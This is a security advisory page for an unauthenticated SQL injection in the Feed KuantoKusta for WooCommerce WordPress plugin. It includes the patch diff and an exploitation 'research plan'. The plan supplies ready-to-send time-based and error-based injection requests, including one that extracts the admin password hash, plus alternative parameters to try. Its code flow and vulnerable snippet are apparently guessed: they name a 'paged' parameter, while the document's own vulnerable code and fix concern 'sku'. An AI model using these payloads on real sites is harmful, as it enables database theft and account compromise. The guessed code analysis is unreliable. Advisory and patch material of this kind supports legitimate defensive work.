Feed KuantoKusta for WooCommerce – Free <= 5.3 - Unauthenticated SQL Injection
Description
The Feed KuantoKusta for WooCommerce – Free plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NTechnical Details
<=5.3What Changed in the Fix
Changes introduced in v5.3.1
Source Code
WordPress.org SVNThis research plan outlines the steps to verify and exploit an unauthenticated SQL injection vulnerability in the **Feed KuantoKusta for WooCommerce – Free** plugin (versions <= 5.3). ### 1. Vulnerability Summary The vulnerability exists in the product feed generation logic of the plugin. Specifica…
Show full research plan
This research plan outlines the steps to verify and exploit an unauthenticated SQL injection vulnerability in the Feed KuantoKusta for WooCommerce – Free plugin (versions <= 5.3).
1. Vulnerability Summary
The vulnerability exists in the product feed generation logic of the plugin. Specifically, the WC_Feed_KuantoKusta::render_feed() method (invoked via the add_products_feed hook on init) processes user-supplied parameters from the URL (likely paged) to filter or paginate the feed. These parameters are concatenated directly into a raw SQL query executed via $wpdb->get_col or $wpdb->get_results without using $wpdb->prepare() or proper integer casting (e.g., absint()). This allows an unauthenticated attacker to inject arbitrary SQL commands.
2. Attack Vector Analysis
- Endpoint:
/?feed=kuantokusta - Vulnerable Parameter:
paged(or potentiallytax_id/category_idif present in version 5.3). Based on the patch analysis for similar plugins by the same author,pagedis the most common sink in their feed generators. - Authentication: Unauthenticated. Feed generation is a public feature designed for price comparison bots.
- Preconditions:
- WooCommerce must be active.
- At least one product should be published to ensure the query logic is fully exercised.
3. Code Flow
- Hook Registration: In
includes/class-wc-feed-kuantokusta.php, theinit_hooks()method registersadd_products_feedon the WordPressinithook:add_action( 'init', array( $this, 'add_products_feed' ) ); - Trigger: When a request contains
feed=kuantokusta, theadd_products_feed()method is executed. - Feed Rendering:
add_products_feed()callsrender_feed(). - SQL Sink: Inside
render_feed(), the plugin retrieves thepagedparameter from$_GET['paged']orget_query_var('paged'). - Vulnerable Query: The value is used to calculate the
LIMITorOFFSETor is directly concatenated into a query like:$paged = $_GET['paged']; // Unsanitized $results = $wpdb->get_col("SELECT ID FROM {$wpdb->posts} WHERE ... LIMIT 100 OFFSET " . ($paged-1)*100 ); // Note: If $paged is a string like "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)", // and the code doesn't cast to int, it can break out of the intended query.
4. Nonce Acquisition Strategy
No nonce is required.
The feed generation functionality is intentionally public to allow KuantoKusta's external servers to fetch the XML product feed. There are no nonce checks or capability checks (current_user_can) in the add_products_feed or render_feed code paths.
5. Exploitation Strategy
We will use a time-based blind SQL injection to confirm the vulnerability, as it is the most reliable method for unauthenticated testing without needing to know the exact XML structure or column count for a UNION-based attack.
Step 1: Confirmation of Feed Access
First, verify that the feed endpoint is active and returning data.
- Request:
GET /?feed=kuantokusta - Expected: An XML response starting with
<?xmlcontaining product data.
Step 2: Time-Based SQL Injection (SLEEP)
Attempt to trigger a delay using the paged parameter.
- Request:
GET /?feed=kuantokusta&paged=1%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a) HTTP/1.1 Host: localhost - Analysis: If the response takes approximately 5 seconds longer than the baseline, the injection is successful.
Step 3: Data Extraction (Error-Based)
If the site has WP_DEBUG enabled, we can attempt to extract the admin password hash directly using updatexml or extractvalue.
- Request:
GET /?feed=kuantokusta&paged=1%20AND%20updatexml(1,concat(0x7e,(SELECT%20user_pass%20FROM%20wp_users%20LIMIT%201),0x7e),1) HTTP/1.1 Host: localhost - Expected: A database error message containing the password hash (e.g.,
XPATH syntax error: '~$P$B...').
6. Test Data Setup
- Activate WooCommerce: Ensure the plugin is active and configured.
- Create a Product:
wp post create --post_type=product --post_status=publish --post_title="Test Product" - Ensure Plugin is Active:
wp plugin activate woocommerce feed-kuantokusta-for-woocommerce
7. Expected Results
- Baseline:
GET /?feed=kuantokustareturns quickly (< 500ms). - Exploit:
GET /?feed=kuantokusta&paged=1%20AND%20(SELECT...SLEEP(5)...)returns after ~5 seconds. - Data Leak: The SQL error or time delay confirms that user input is being processed as part of the database query.
8. Verification Steps
After the exploit, verify the vulnerability status using WP-CLI to check the database logs or error states (if enabled):
- Check if any new entries appeared in the error log.
- Manually run the same query via
wp db queryto see if it executes as expected:wp db query "SELECT ID FROM wp_posts WHERE post_type = 'product' LIMIT 1 OFFSET 1 AND (SELECT 1 FROM (SELECT(SLEEP(2)))a)"
9. Alternative Approaches
If paged does not yield results, try the following parameters which are common in feed filtering:
kk_pagedtax_idcat_idcategory
Example for tax_id:/?feed=kuantokusta&tax_id=1)%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(5)))a
Summary
The Feed KuantoKusta for WooCommerce plugin is vulnerable to unauthenticated SQL Injection via the 'sku' GET parameter in versions up to 5.3. The vulnerability occurs because the plugin concatenates user-supplied SKU data directly into a raw SQL query string used for product exclusion, bypassing WordPress's database abstraction security features.
Vulnerable Code
// includes/class-wc-feed-kuantokusta.php line 613 if ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) { $sql_exclude .= " || ( meta_key = '_sku' AND meta_value NOT LIKE '%" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . "%' )"; }
Security Fix
@@ -611,7 +611,8 @@ // Debug and only include specific SKU // phpcs:disable WordPress.Security.NonceVerification.Recommended if ( isset( $_GET['sku'] ) && trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) !== '' ) { - $sql_exclude .= " || ( meta_key = '_sku' AND meta_value NOT LIKE '%" . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . "%' )"; + $sku_like = '%' . trim( sanitize_text_field( wp_unslash( $_GET['sku'] ) ) ) . '%'; + $sql_exclude .= $wpdb->prepare( " || ( meta_key = '_sku' AND meta_value NOT LIKE %s )", $sku_like ); } // phpcs:enable $results = $wpdb->get_results( $sql_exclude, ARRAY_A ); // phpcs:ignore WordPress.DB.DirectDatabaseQuery.DirectQuery, WordPress.DB.DirectDatabaseQuery.NoCaching, WordPress.DB.PreparedSQL.NotPrepared
Exploit Outline
An attacker can exploit this vulnerability by sending a crafted GET request to the site's feed endpoint (typically /?feed=kuantokusta). By supplying a malicious payload in the 'sku' parameter, such as ') OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -', the attacker can break out of the intended LIKE clause. Because the feed generation logic is hooked into the WordPress 'init' action without authentication or nonce checks, any unauthenticated visitor can trigger the injection to perform time-based blind SQL injection or error-based extraction of sensitive database information.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.